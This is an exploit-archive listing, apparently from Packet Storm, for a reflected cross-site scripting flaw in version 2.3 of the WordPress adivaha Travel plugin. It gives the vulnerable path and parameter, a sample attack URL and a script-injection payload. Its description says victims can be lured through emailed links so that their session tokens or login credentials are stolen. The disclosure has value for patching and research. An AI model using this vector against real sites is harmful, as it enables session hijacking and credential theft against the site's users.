Lucene search

K
packetstormCraCkErPACKETSTORM:173994
HistoryAug 04, 2023 - 12:00 a.m.

WordPress Adivaha Travel 2.3 Cross Site Scripting

2023-08-0400:00:00
CraCkEr
packetstormsecurity.com
76
exploit
vendor
cross site scripting
windows 10
impact
greetings
`# Exploit Title: WordPress adivaha Travel Plugin 2.3 - Reflected XSS  
# Exploit Author: CraCkEr  
# Date: 29/07/2023  
# Vendor: adivaha - Travel Tech Company  
# Vendor Homepage: https://www.adivaha.com/  
# Software Link: https://wordpress.org/plugins/adiaha-hotel/  
# Demo: https://www.adivaha.com/demo/adivaha-online/  
# Tested on: Windows 10 Pro  
# Impact: Manipulate the content of the site   
  
  
## Greetings  
  
The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09, indoushka   
CryptoJob (Twitter) twitter.com/0x0CryptoJob  
  
  
## Description  
  
The attacker can send to victim a link containing a malicious URL in an email or instant message  
can perform a wide variety of actions, such as stealing the victim's session token or login credentials  
  
  
Path: /mobile-app/v3/  
  
GET parameter 'isMobile' is vulnerable to XSS  
  
https://www.website/mobile-app/v3/?pid=77A89299&isMobile=[XSS]  
  
  
XSS Payload: clq95"><script>alert(1)</script>lb1ra  
  
  
[-] Done  
`